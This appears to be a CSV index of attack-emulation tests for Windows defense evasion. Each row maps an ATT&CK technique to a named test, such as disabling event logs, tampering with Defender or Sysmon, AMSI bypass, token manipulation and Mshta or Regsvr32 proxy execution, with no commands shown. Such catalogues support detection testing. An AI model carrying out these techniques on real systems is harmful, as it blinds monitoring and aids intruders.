defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
147 defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
148 defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
149 defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
150 defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
151 defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
152 defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
153 defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
154 defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
155 defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
156 defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
157 defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
158 defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
159 defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
160 defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
161 defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
162 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
163 defense-evasion T1112 Modify Registry 35 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
164 defense-evasion T1112 Modify Registry 36 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
165 defense-evasion T1112 Modify Registry 37 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
166 defense-evasion T1112 Modify Registry 38 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
167 defense-evasion T1112 Modify Registry 39 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
168 defense-evasion T1112 Modify Registry 40 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
169 defense-evasion T1112 Modify Registry 41 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
170 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
171 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
172 defense-evasion T1112 Modify Registry 44 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
173 defense-evasion T1112 Modify Registry 45 Mimic Ransomware - Enable Multiple User Sessions 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3 command_prompt
174 defense-evasion T1112 Modify Registry 46 Mimic Ransomware - Allow Multiple RDP Sessions per User 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9 command_prompt
175 defense-evasion T1112 Modify Registry 47 Event Viewer Registry Modification - Redirection URL 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae command_prompt
176 defense-evasion T1112 Modify Registry 48 Event Viewer Registry Modification - Redirection Program 81483501-b8a5-4225-8b32-52128e2f69db command_prompt
177 defense-evasion T1112 Modify Registry 49 Enabling Remote Desktop Protocol via Remote Registry e3ad8e83-3089-49ff-817f-e52f8c948090 command_prompt
178 defense-evasion T1112 Modify Registry 50 Disable Win Defender Notification 12e03af7-79f9-4f95-af48-d3f12f28a260 command_prompt
179 defense-evasion T1112 Modify Registry 51 Disable Windows OS Auto Update 01b20ca8-c7a3-4d86-af59-059f15ed5474 command_prompt
180 defense-evasion T1112 Modify Registry 52 Disable Windows Auto Reboot for current logon user 396f997b-c5f8-4a96-bb2c-3c8795cf459d command_prompt
181 defense-evasion T1112 Modify Registry 53 Windows Auto Update Option to Notify before download 335a6b15-b8d2-4a3f-a973-ad69aa2620d7 command_prompt
182 defense-evasion T1112 Modify Registry 54 Do Not Connect To Win Update d1de3767-99c2-4c6c-8c5a-4ba4586474c8 command_prompt
183 defense-evasion T1112 Modify Registry 55 Tamper Win Defender Protection 3b625eaa-c10d-4635-af96-3eae7d2a2f3c command_prompt
184 defense-evasion T1112 Modify Registry 56 Snake Malware Registry Blob 8318ad20-0488-4a64-98f4-72525a012f6b powershell
185 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
186 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
187 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
188 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
189 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
190 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
191 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
192 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
193 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
194 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
195 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
196 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
197 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
198 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
199 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
200 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
201 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
202 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
203 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
204 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
205 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
206 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
207 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
208 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
209 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
210 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
211 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
212 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
213 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
214 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
215 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
216 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
217 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
218 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
219 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
220 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
221 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
222 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
223 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
224 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
225 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
226 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
227 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
228 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
229 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
230 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
231 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
232 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
233 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
234 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
235 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
236 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
237 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
238 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
239 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
240 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
241 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
242 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
243 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
244 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
245 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
246 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
247 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
248 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
249 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
250 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
251 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
252 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
253 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
254 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
255 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
256 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
257 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
258 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
259 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
260 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
261 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
262 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
263 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
264 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
265 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
266 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
267 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
268 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
269 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
270 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
271 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 Delete Windows Defender Scheduled Tasks 4b841aa1-0d05-4b32-bbe7-7564346e7c76 command_prompt
272 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Hypervisor-Enforced Code Integrity (HVCI) 70bd71e6-eba4-4e00-92f7-617911dbe020 powershell
273 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
274 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
275 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
276 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
277 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
278 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
279 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
280 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
281 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
282 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
283 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
284 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
285 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
286 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
287 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
288 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
289 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
290 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
291 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
292 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
293 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
294 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
295 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
296 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
297 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
298 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
299 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
